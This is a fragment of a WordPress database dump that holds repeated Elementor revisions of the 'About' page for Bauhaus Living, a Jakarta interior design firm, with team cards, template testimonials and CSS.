infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:33:43','2023-09-22 08:33:43','',38,'https://bauhaus.futuremediatrix.com/?p=4846',0,'revision','',0),(4847,3,'2023-09-22 08:33:43','2023-09-22 08:33:43','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								\"Let\'s turn your ideas into reality\"							</h2>\n		<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:33:43','2023-09-22 08:33:43','',38,'https://bauhaus.futuremediatrix.com/?p=4847',0,'revision','',0),(4848,3,'2023-09-22 08:33:43','2023-09-22 08:33:43','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								\"Let\'s turn your ideas into reality\"							</h2>\n		<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n							